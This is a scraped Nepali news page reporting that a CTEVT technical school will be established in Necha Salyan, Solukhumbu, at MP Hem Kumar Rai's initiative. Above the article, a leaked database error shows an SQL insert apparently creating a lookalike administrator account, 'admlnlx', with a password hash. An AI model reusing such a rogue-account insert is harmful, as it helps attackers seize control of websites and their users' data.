WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGTpAQOD57bRWPbxv2FB2/xh0hwega1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-06 21:02:47', '', 'admlnlx', 'admlnlx')

सांसद राईको पहलमा नेचासल्यानमा सिटिइभिटिको आंगिक शिक्षालय स्थापना हुने – Gaule Khabar

सांसद राईको पहलमा नेचासल्यानमा सिटिइभिटिको आंगिक शिक्षालय स्थापना हुने

सांसद राईको पहलमा नेचासल्यानमा सिटिइभिटिको आंगिक शिक्षालय स्थापना हुने

काठमाण्डौ । सोलुखुम्बुको नेचासल्यान गाउँपालिकामा आंगिक शिक्षालय स्थापना हुने भएको छ । प्राविधिक शिक्षा तथा व्यवसायिक तालीम परिषद् भक्तपुरले आंगिक शिक्षालय स्थापनाका लागि अनुमती दिएको हो ।

संघिय सांसद हेमकुमार राई “सुरवीर” को पहलमा नेचासल्यान गाउँपालिकामा आंगिक शिक्षालय स्थापना गर्ने अनुमति प्राप्त भएको हो । शिक्षालय स्थापनाका लागि ३५ रोपनी जग्गाको आवश्यक पर्ने छ । आफ्नै भौतिक संरचना सहित शिक्षालय स्थापना हुने सांसद राईको सचिवालयले जनाएको छ ।

जिल्लाबाट हजारौ विद्यार्थी प्राविधिक शिक्षा तथा सिपमुलक तालिम लिनका लागि ठुलो रकम खर्चिएर बाहिर जानुपर्ने बाध्यतात्मक स्थिती रहेकाले यसको अन्त्यका लागि शिक्षालय स्थापना गर्न लागिएको सांसद राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका